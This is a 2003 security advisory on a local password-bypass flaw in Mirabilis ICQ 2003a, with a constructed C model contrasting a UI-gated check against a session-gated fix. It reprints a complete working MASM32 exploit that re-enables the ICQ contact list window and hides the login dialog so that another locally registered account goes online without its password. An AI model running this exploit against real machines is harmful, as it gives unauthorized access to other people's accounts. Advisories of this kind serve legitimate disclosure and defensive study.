Mirabilis ICQ Password Authentication Bypass Vulnerability
Release date: 2003-07-05
Update date: 2003-07-14
Affected systems:
Mirabilis ICQ 2003a Build 3800
Mirabilis ICQ 2003a Build 3799
Mirabilis ICQ 2003a Build 3777
Description:
BUGTRAQ ID: 8111
Mirabilis ICQ is a popular instant messaging program.
Mirabilis ICQ has a design flaw: a local attacker can use a few Win32 API calls to access and use another user's ICQ account.
Calling the EnableWindow API function activates (re-enables) the ICQ Contact List window. Once the window is active, the ICQ status can be set to online and the other user's account is used without any password check.
<*Source: "Caua" Moura Prado (mouraprado@infoguerra.com.br)
  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105760672128834&w=2
*>
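The flaw described above is a privileged action (going online) gated on UI state that any process on the same desktop can change, rather than on authentication state. The C model below is added here and is not part of the advisory or of ICQ's code; it reproduces that pattern beside a hardened variant, and every name in it (icq_model, status_gate_vulnerable, status_gate_hardened, status_change_allowed, the sample password) is constructed for the illustration.

```c
#include <stdbool.h>
#include <string.h>

/* Constructed sample credential for this model, not any real ICQ secret. */
static const char *kModelPassword = "correct-horse";
/* Model of the client state the advisory describes. ui_enabled and
 * login_visible mirror Win32 window state, which any process on the same
 * desktop can flip; session_ok is set only by the credential check. */
typedef struct {
    bool ui_enabled;    /* contact list window enabled? */
    bool login_visible; /* modal login dialog shown? */
    bool session_ok;    /* credential check passed? */
} icq_model;

static void model_init(icq_model *m) {
    m->ui_enabled = false; /* disabled while the login dialog is modal */
    m->login_visible = true;
    m->session_ok = false;
}
/* Legitimate path: only a correct password opens a session. */
static bool model_login(icq_model *m, const char *password) {
    if (strcmp(password, kModelPassword) != 0)
        return false;
    m->session_ok = true;
    m->login_visible = false;
    m->ui_enabled = true;
    return true;
}

/* All a local process can change from outside: window state only. */
static void model_window_tamper(icq_model *m) {
    m->ui_enabled = true;     /* EnableWindow(parent, TRUE) */
    m->login_visible = false; /* ShowWindow(login, SW_HIDE) */
}

/* Vulnerable gate: the action trusts UI state ("the window is enabled"). */
bool status_gate_vulnerable(const icq_model *m) {
    return m->ui_enabled && !m->login_visible;
}
/* Hardened gate: the action checks the session the password check opened. */
bool status_gate_hardened(const icq_model *m) { return m->session_ok; }
/* Scenario driver: NULL password = no login attempt, only window tampering. */
bool status_change_allowed(const char *password, bool hardened) {
    icq_model m;
    model_init(&m);
    if (password == NULL) model_window_tamper(&m);
    else model_login(&m, password);
    return hardened ? status_gate_hardened(&m) : status_gate_vulnerable(&m);
}
```

With only window tampering and no password, the UI-gated variant lets the status change through while the session-gated variant refuses it; a correct password passes both.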
Test method:
Warning
The following program (method) may be offensive in nature and is provided only for security research and teaching. Use at your own risk!
; CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE BOF
; -------------------------------------------------------------------------
;
; 07/02/2003 - ca1-icq.asm
; ICQ Password Bypass exploit.
; written by Cauã Moura Prado (aka ca1)
; mouraprado@infoguerra.com.br - ICQ 373313
;
; This exploit allows you to login to ICQ server using any account registered *locally*
; no matter the 'save password' option is checked or not. High level security is also bypassed.
; All you have to do is run the exploit and set status property using your mouse when the flower
; is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
; the exploit again. Greets to: Alex Demchenko(aka Coban), my cousin Rhenan for testing the exploit
; on his machine and that tiny Israeli company for starting the whole thing. Oh sure.. hehehe
; I can't forget... many kisses to those 3 chicks from my building for being so hot!! ;)
;
;
; uh-oh!
;        ___
;     __/   \__
;    /  \___/  \          Vulnerable:
;    \__/+ +\__/          ICQ Pro 2003a Build #3800
;    /  \~~~/  \          Not Vulnerable:
;    \__/   \__/          ICQ Lite alpha Build 1211
;       \___/             ICQ 2001b and ICQ 2002a
;    tHe Flaw Power       All other versions were not tested.
;
; coded with masm32
;
; _____________________________________________________________________ exploit born in .br

.386
.model flat, stdcall
option casemap:none
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

.data
szTextHigh  byte 'Password Verification', 0
szTextLow   byte 'Login to server', 0
szClassName byte '#32770', 0

.data?
hWndLogin   dword ?

.code
_entrypoint:
    invoke FindWindow, addr szClassName, addr szTextHigh
    mov hWndLogin, eax
    .if hWndLogin == 0
        invoke FindWindow, addr szClassName, addr szTextLow
        mov hWndLogin, eax
    .endif
    invoke GetParent, hWndLogin
    invoke EnableWindow, eax, 1        ; Enable ICQ contact list
    invoke ShowWindow, hWndLogin, 0    ; get rid of Login screen (don't kill this window)
    invoke ExitProcess, 0              ; uhuu.. cya! i gotta sleep!
end _entrypoint
; CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE EOF
; -------------------------------------------------------------------------
Recommendation:
Vendor patch:
Mirabilis
---------
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
http://www.icq.com